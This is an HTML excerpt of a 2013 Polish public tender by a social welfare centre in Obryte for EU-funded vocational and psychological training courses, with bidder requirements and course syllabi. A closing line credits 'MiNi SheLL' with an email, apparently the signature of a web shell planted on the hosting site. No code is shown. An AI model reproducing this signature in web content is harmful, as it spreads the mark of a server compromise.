<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny. Warunek ten zostanie  spełniony na podstawie złożonego  oświadczenia , że osoby uczestniczące w wykonywaniu zamówień posiadają wymagane uprawnienia - zał. nr 5,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny. Warunek ten zostanie  spełniony na podstawie złożonego  oświadczenia z art.22.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.  Wszelkie zmiany, uzupełnienia i oświadczenia składane w związku z niniejszą Umową wymagają pisemnej zgody stron Umowy, pod rygorem ich nieważności. 
2.  Zmiany niniejszej umowy dozwolone są jedynie w granicach wskazanych treścią art. 144 ustawy prawo zamówień publicznych i wymagają formy pisemnej pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.obryte.pl - bip,<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Ośrodek Pomocy Społecznej w Obrytem
07-215 Obryte 185
tel.029  74 11 105.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.06.2013 godzina 10:45, miejsce: Ośrodek Pomocy Społecznej, Obryte nr 185, 07-215 Obryte,.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Razem i Aktywnie  Projekt współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Porady psychologiczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ilość  osób 	9 osób
Ilość godzin dydaktycznych (1 godzina=
45min)	67 godzin w tym: 18 godzin z doradztwa zawodowego  i 49 godzin zajęć warsztatów psychologicznych ( dla 9 osób po 5 godz, warsztatów indywidualnych oraz 4 godz. zajęć grupowych).

Dojazd do miejsca realizacji kursu	Cena dojazdu beneficjentów do miejsca realizacji kursu powinna być
wkalkulowana w cenę ofertową
Termin zajęć	VII-2013  do XI-2013r.
Program powinien zawierać
wskazane poniżej minimum
programowe	Budowanie poczucia własnej wartości: 
a) Czym jest poczucie własnej wartości. 
b) Wpływ samooceny na nasze życie. 
c) Sposoby na podniesienie poczucia własnej wartości. 
d) Wzmocnienie wiary we własne możliwości. 
Kształtowanie postawy asertywnej: 
a) Czym jest asertywność. 
b) Asertywne przyjmowanie ocen.
c) Przyjęcie aktywnej postawy w pokonywaniu życiowych trudności. 

Efektywna komunikacja: 
a) Charakterystyka procesu komunikacji. 
b) Techniki i metody efektywnej komunikacji w relacjach i kontaktach międzyludzkich. 
c) Komunikacja werbalna i niewerbalna. 
d) Diagnoza swojego stylu komunikacji. 
e) Sztuka słuchania i analizowania wypowiedzi. 
f) Komunikacja asertywna. 
Naukę radzenie sobie ze stresem: 
a) Mechanizm oddziaływania stresu na organizm. 
b) Uświadomienie uczestnikom indywidualnej podatności i odporności na stres. 
c) Odporność i radzenie sobie ze stresem. 
d) Sposoby optymalnego reagowania na bierność i agresję. 
Doradztwo zawodowe:
      a) udzielaniu niezbędnych informacji o zawodach, rynku pracy oraz      możliwościach kształcenia i szkolenia,
      b) udzielaniu pomocy w formie indywidualnych i grupowych porad zawodowych,
      c) określaniu predyspozycji zawodowych,
Materiały szkoleniowe	Każdy uczestnik kursu musi mieć zapewnione przez Wykonawcę wszystkie niezbędne materiały i narzędzia do odbycia kursu (wszystkie materiały dla beneficjentów muszą zawierać logotypy) oraz musi otrzymać na własność: program kursu i harmonogram zajęć, materiały szkoleniowe zgodne z tematyką kursu (jeden komplet dla Zamawiającego na potrzeby dokumentacji projektowej) oraz materiały biurowe (teczka papierowa formatu A4, zeszyt i długopis)
Usługa gastronomiczna	Wykonawca musi zapewnić podczas zajęć teoretycznych i praktycznych  na kursie barek kawowy dla każdego uczestnika kursu zawodowego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.51.00.00-2, 80.57.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.07.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> ZADANIE 1. Obsługa kasy fiskalnej + obsługa komputera z elementami komputerowego wspierania firmy.
Zadanie 2: Opiekunka osób starszych i dzieci
Zadanie 3: Prawo jazdy kat. B.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE 1. Obsługa kasy fiskalnej + obsługa komputera z elementami komputerowego wspierania firmy.
Ilość osób	3 osoby
Ilość godzin dydaktycznych (1 godzina=
45min)	80 godzin w tym: 20 godzin zajęć teoretycznych i 60 godzin zajęć
praktycznych.
30 godzin kasy fiskalnej
50 godzin obsługi komputera
Dojazd do miejsca realizacji kursu	Cena dojazdu beneficjentów do miejsca realizacji kursu powinna być
wkalkulowana w cenę ofertową
Termin zajęć 	VII-2013  do XI-2013r.
Program powinien zawierać
wskazane poniżej minimum
programowe	Kasa fiskalna
1. Znaczenie i funkcje kasy fiskalnej
2. Wygląd kasy i opis klawiatury
3. Uruchomienie kasy i wymiana papieru
4. Zasady sprzedaży
5.Sporzadzanie raportów, faktur, rachunku
6.Obsługa programu do fakturowania
7. Zajęcia praktyczne na kasach fiskalnych
Obsługa komputera
1. Obsługa oprzyrządowania komputerowego.
- budowa komputera, prawidłowe uruchamianie i wyłączanie
komputera,
- urządzenia peryferyjne,
- typy drukarek,
- zastosowanie skanera,
- porty we/wy, sposoby podłączenia urządzeń peryferyjnych.
2. System operacyjny Windows.
- funkcje systemu,
-  funkcje pulpitu Windows,
-  uruchamianie programów,
-  programy instalowane podczas systemu operacyjnego,
-  opis panelu sterowania,
- przeglądanie zasobów komputera.
3. Administrowanie danymi.
-  operacje na plikach i folderach,
- tworzenie oraz kasowanie, folderów, plików,
- kopiowanie, przenoszenie, wklejanie plików, folderów,
-  kosz systemowy.
4. Edytor tekstu (Microsoft Word).
-  zastosowanie i funkcje programu,
- elementy okna programu,
- wpisywanie i edycja tekstu,
-  wstawianie grafiki, tabel, symboli do dokumentu,
-  formatowanie dokumentu (czcionki, rozmiaru, koloru, akapitów,
tabulatorów),
- opcje oraz drukowanie dokumentów.
5. Arkusz kalkulacyjny excel
- zastosowanie oraz funkcje programu,
- poruszanie się po arkuszu,
-  wprowadzanie i zmiana danych,
-  wykonywanie obliczeń, tworzenie wykresów,
-  drukowanie arkusza.
6. Internet, poczta elektroniczna, komunikatory internetowe.
- umiejętność korzystania z przeglądarek internetowych IE,
Firefox, Opera),
- wyszukiwanie danych w globalnej sieci,
- poczta elektroniczna: m. in. Outlook, zakładanie oraz
korzystanie z konta e-mail (wysyłanie i odbieranie
korespondencji),
-  ogólna wiedza nt: komunikatorów internetowych (zakładanie
kont, komunikacja, itp.).
Programy użytkowe w firmie:
- zasady działania i pracy z programami użytkowymi firmy, 
- ćwiczenia na programach użytkowych wspomagających pracę firmy.
Materiały szkoleniowe	Każdy uczestnik kursu musi mieć zapewnione przez Wykonawcę wszystkie niezbędne materiały i narzędzia do odbycia kursu (wszystkie materiały dla beneficjentów muszą zawierać logotypy) oraz musi otrzymać na własność: program kursu i harmonogram zajęć, materiały szkoleniowe zgodne z tematyką kursu (jeden komplet dla Zamawiającego na potrzeby dokumentacji projektowej) oraz materiały biurowe (teczka papierowa formatu A4, zeszyt i długopis)
Usługa gastronomiczna	Wykonawca musi zapewnić podczas zajęć teoretycznych i praktycznych  na kursie barek kawowy oraz obiad jednodaniowy dla każdego uczestnika kursu zawodowego. 


Zadanie 2: Opiekunka osób starszych i dzieci
Ilość osób	1 osoba
Ilość godzin dydaktycznych
(1 godzina=45min)	60 godzin
Dojazd do miejsca realizacji kursu
	Cena dojazdu beneficjentów do miejsca realizacji kursu powinna być wkalkulowana w cenę ofertową
Termin zajęć	VII -2013r. do XI- 2013 r.
Program powinien zawierać
wskazane poniżej minimum programowe	1. Sylwetka zawodowa opiekuna osoby starszej: rola i zadania
opiekuna osób i formy opieki
2. Fizjologiczne i psychologiczne aspekty starzenia się.
3. Choroby wieku podeszłego, obserwacja podopiecznego, pomiar i
analiza parametrów.
4. Organizacja opieki zdrowotnej i pomocy społecznej (na terenie UE).
5. Pierwsza pomoc w nagłych przypadkach
6. Budowanie relacji z podopiecznym i jego rodziną
7. Pielęgnacja osób starszych i przewlekle chorych.
8. Postępowanie w wybranych problemach zdrowotnych.
9. Terapia zajęciowej, fizjoterapia, rehabilitacja
10. Wybrane zagadnienia farmakoterapii
11. Zasady żywienia ludzi chorych, starszych i niepełnosprawnych.
Dzieci
Podstawowe zagadnienia dotyczące rozwoju i wychowania dziecka
Podstawy psychologii rozwojowej
Zasady i metody wychowania dziecka
Rozpoznawanie i zaspokajanie potrzeb dziecka
Wpływ zabawy na rozwój dziecka
Przygotowanie i dobór pomocy do zabaw
Rodzaje i propozycje zajęć
Potrzeby biologiczne małego dziecka
Choroby wieku dziecięcego w pigułce - rola opiekunki dziecięcej
Opieka nad chorym dzieckiem
Żywienie niemowląt i małych dzieci
Pierwsza pomoc dzieciom w nagłych wypadkach
Wypoczynek a rozwój małego dziecka - spacer, hartowanie, sen
Kąpiel i pielęgnacja skóry dziecka 1 - 3 rok życia
Nagła śmierć łóżeczkowa - jak jej zapobiec?
Materiały
szkoleniowe	Każdy uczestnik kursu musi mieć zapewnione przez Wykonawcę
wszystkie niezbędne materiały i narzędzia do odbycia kursu (wszystkie
materiały dla beneficjentów musza zawierać logotypy) oraz musi
otrzymać na własność: program kursu i harmonogram zajęć, materiały
szkoleniowe zgodne z tematyką kursu (jeden komplet dla Zamawiającego na potrzeby dokumentacji projektowej) oraz materiały biurowe (teczka papierowa formatu A4, zeszyt i długopis)
Usługa gastronomiczna	Wykonawca musi zapewnić podczas zajęć teoretycznych i praktycznych  na kursie barek kawowy oraz obiad jednodaniowy dla każdego uczestnika kursu zawodowego. 




Zadanie 3: Prawo jazdy kat. B
Ilość osób	2 osoby
Ilość godzin dydaktycznych
(1 godzina=45min)	60 godzin na jedną osobę
Dojazd do miejsca realizacji kursu	Cena dojazdu beneficjentów do miejsca realizacji kursu powinna być
wkalkulowana w cenę ofertową
Termin zajęć	VII- 2013r. do XI- 2013 r.
Program powinien zawierać wskazane poniżej minimum programowe	Program szkolenia teoretycznego
- Budowa, obsługa i eksploatacja samochodu osobowego
- Ogólne zasady poruszania się samochodem po drodze:
zachowanie ostrożności i właściwej postawy w stosunku do innych uczestników ruchu drogowego
- Zasady zachowania bezpiecznych odległości między pojazdami
- Środki wpływające na percepcję i szybkość reakcji (alkohol,
narkotyki, leki), wpływ zmęczenia i stanu emocjonalnego na
zachowanie kierowcy
- Ocena warunków na drodze - warunki atmosferyczne,
widoczność, nawierzchnia, bezpieczna jazda samochodem w różnych warunkach
- Bezpieczne przewożenie pasażerów dorosłych i dzieci
- Znaki drogowe
- Ruszanie, włączanie się do ruchu, zatrzymanie, postój
- Manewry (wyprzedzanie, omijanie, wymijanie, zmiana pasa ruchu)
- Skrzyżowania, ronda, ruch kierowany
- Używanie świateł pojazdu
- Dokumentacja pojazdu, kontrola drogowa
- Udzielanie pierwszej pomocy
- Zasady postępowania w razie uczestniczenia w wypadku lub kolizji drogowej
- Błędy najczęściej popełniane przez kierowców
- Przygotowanie do egzaminu teoretycznego
- Egzamin wewnętrzny
Program szkolenia praktycznego
- Budowa i obsługa samochodu
- Przygotowanie do jazdy, ruszanie, zatrzymanie, zmiana biegów
- Zmiana kierunku jazdy, cofanie
- Obsługa świateł
- Plac manewrowy - ćwiczenie umiejętności manewrowania pojazdem
- Jazda w terenie (dostosowanie prędkości do warunków na drodze, hamowanie awaryjne, bieg 5 i 6)
- Jazda w ruchu ulicznym (pasy ruchu, skrzyżowania, ronda, obserwowanie i przewidywanie działań innych uczestników
ruchu)
- Manewry w ruchu ulicznym (wyprzedzanie, omijanie, wymijanie, parkowanie)
- Jazda sportowa (wychodzenie z poślizgu, ostre wchodzenie w zakręty)
- Jazda z nawigacją
- Stacja benzynowa (tankowanie benzyny, oleju napędowego, gazu)
- Stacja kontroli pojazdów
- Czynności kontrolne na drodze
- Awaria na drodze (diagnostyka, zmiana koła, uzupełnienie płynów eksploatacyjnych)
- Plac manewrowy - przygotowanie do egzaminu
- Trasy egzaminacyjne - przygotowanie do egzaminu
- Egzamin wewnętrzny
Materiały szkoleniowe	Każdy uczestnik kursu musi mieć zapewnione przez Wykonawcę wszystkie niezbędne materiały i narzędzia do odbycia kursu (wszystkie
materiały dla beneficjentów musza zawierać logotypy) oraz musi otrzymać na własność: program kursu i harmonogram zajęć, materiały
szkoleniowe zgodne z tematyką kursu (jeden komplet dla Zamawiającego na potrzeby dokumentacji projektowej) oraz materiały
biurowe (teczka papierowa formatu A4, zeszyt i długopis)
Usługa gastronomiczna	Wykonawca musi zapewnić podczas zajęć teoretycznych na kursie barek kawowy oraz obiad jednodaniowy dla każdego uczestnika kursu zawodowego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.51.00.00-2, 80.57.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.07.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie 1:  Spawanie blach i rur spoinami pachwinowymi i czołowymi metodą MAG (135)
Zadanie 2 :Operator koparko-ładowarki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 1:  Spawanie blach i rur spoinami pachwinowymi i czołowymi metodą MAG (135)
Ilość osób 	1 osoba
Ilość godzin dydaktycznych
(1 godzina= 45min)	Łączna liczba godzin szkolenia: 302 godz. (godzina kursu liczy 60 minut i obejmuje zajęcia dydaktyczne liczące 45 minut oraz przerwę liczącą 15 minut)

Dojazd do miejsca realizacji kursu	Cena dojazdu beneficjenta do miejsca realizacji kursu powinna być
wkalkulowana w cenę ofertową
Termin zajęć	VII- 2013r. do XI -2013 r.
Program
powinien zawierać
wskazane poniżej
minimum programowe	Spawanie blach i rur spoinami pachwinowymi
1. Zastosowanie elektryczności do spawania łukowego.
2. Urządzenia spawalnicze.
3. Bezpieczeństwo i higiena pracy.
4. Bezpieczna praca na hali produkcyjnej.
5. Materiały dodatkowe do spawania.
6. Spawanie w praktyce.
7. Oznaczenie i wymiarowanie spoin.
8. Metody przygotowania złączy do spawania.
9. Kwalifikowanie spawaczy.
10. Zajęcia praktyczne.
Spawanie blach i rur spoinami czołowymi
1. Wprowadzenie do zagadnień wytwarzania stali.
2. Złącza spawane blach i rur.
3. Spawalność stali.
4. Skurcz, naprężenie i odkształcenia.
5. Niezgodności spawalnicze.
6. Przegląd procesów spawania.
7. Bezpieczna praca na montażu.
8. Kontrola i badania.
9. Zapewnienie jakości w spawalnictwie.
10. Zajęcia praktyczne.

Zaświadczenia/certyfikaty

	Na potwierdzenie zdobytych kwalifikacji uczestnik otrzymuje świadectwo egzaminu kwalifikacyjnego spawacza (certyfikat) oraz wpis do książki wydanej przez Instytut Spawalnictwa w Gliwicach. Wykonawca wyda uczestnikowi, który ukończy szkolenie zaświadczenie
informujące o uczestnictwie w szkoleniu współfinansowanym ze środków Unii
Europejskiej w ramach Europejskiego Funduszu Społecznego, oznakowanych zgodnie
z wytycznymi dotyczącymi oznakowywania projektów w ramach POKL 2007-2013. Treść zaświadczenia zostanie uzgodniona z Zamawiającym,
Materiały szkoleniowe	Każdy uczestnik kursu musi mieć zapewnione przez Wykonawcę wszystkie niezbędne materiały i narzędzia do odbycia kursu (wszystkie materiały dla beneficjentów musza zawierać logotypy) oraz musi otrzymać na własność: program kursu i harmonogram zajęć, materiały szkoleniowe zgodne z tematyką kursu (jeden komplet dla Zamawiającego na potrzeby dokumentacji projektowej) oraz materiały biurowe (teczka papierowa formatu A4, zeszyt i długopis)

Warunki szkolenia
	Wykonawca prowadzi dokumentację z  zajęć w tym : dziennika zajęć, listy obecności uczestnika szkolenia, listy potwierdzającej korzystanie uczestnika szkolenia z posiłków, listy potwierdzającej odbiór materiałów dydaktycznych i piśmienniczych, list
potwierdzającej odbiór zaświadczeń o ukończeniu i uczestnictwie w szkoleniu,
Wykonawca  prowadzi zajęcia zgodnie z przepisami bhp w tym zakresie,
Wykonawca zapewni uczestnikom kursu odzież ochronną, jeżeli konieczność taka wynika z obowiązujących przepisów bhp. 
Usługa gastronomiczna	Wykonawca musi zapewnić podczas zajęć teoretycznych i praktycznych na kursie barek kawowy oraz obiad jednodaniowy dla każdego uczestnika kursu zawodowego.
Ubezpieczenie	Wykonawca ubezpieczy uczestnika  na czas trwania szkolenia od następstw nieszczęśliwych wypadków (NNW).

Zadanie 2 :Operator koparko-ładowarki  
Ilość osób	2 osoby
Ilość godzin dydaktycznych
(1 godzina=45min)	Łączna liczba godzin szkolenia: 176 godz. dla jednego uczestnika szkolenia (godzina kursu liczy 60 minut i obejmuje zajęcia dydaktyczne liczące 45 minut oraz przerwę liczącą 15 minut)

Dojazd do miejsca realizacji kursu	Cena dojazdu beneficjentów do miejsca realizacji kursu powinna być wkalkulowana w cenę ofertową
Program powinien zawierać
wskazane poniżej minimum
programowe	Program szkolenia powinien obejmować następujące zagadnienia:
1) użytkowanie eksploatacyjne,
2) dokumentacja techniczna,
3) bezpieczeństwo i higiena pracy,
4) podstawy elektrotechniki,
5) silniki spalinowe,
6) elementy hydrauliki,
7) budowa koparko-ładowarki,
8) technologia robót,
9) zajęcia praktyczne.
Warunki szkolenia
	Wykonawca prowadzi dokumentację z  zajęć w tym : dziennika zajęć, listy obecności uczestnika szkolenia, listy potwierdzającej korzystanie uczestnika szkolenia z posiłków, listy potwierdzającej odbiór materiałów dydaktycznych i piśmienniczych, listy    potwierdzającej odbiór zaświadczeń o ukończeniu i uczestnictwie w szkoleniu,
Wykonawca  prowadzi zajęcia zgodnie z przepisami bhp w tym zakresie.
Wykonawca zapewni uczestnikom kursu odzież ochronną, jeżeli konieczność taka wynika z obowiązujących przepisów bhp. 
 
Materiały szkoleniowe	Każdy uczestnik kursu musi mieć zapewnione przez Wykonawcę wszystkie niezbędne materiały i narzędzia do odbycia kursu (wszystkie materiały dla beneficjentów muszą zawierać logotypy) oraz musi otrzymać na własność: program kursu i harmonogram zajęć, materiały szkoleniowe zgodne z tematyką kursu (jeden komplet dla Zamawiającego na potrzeby dokumentacji projektowej) oraz materiały biurowe (teczka papierowa formatu A4, zeszyt i długopis)
Usługa gastronomiczna	Wykonawca musi zapewnić podczas zajęć teoretycznych i praktycznych na kursie barek kawowy oraz obiad jednodaniowy dla każdego uczestnika kursu zawodowego.
Ubezpieczenie	Wykonawca ubezpieczy uczestnika  na czas trwania szkolenia od następstw nieszczęśliwych wypadków (NNW)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.51.00.00-2, 80.57.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.07.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com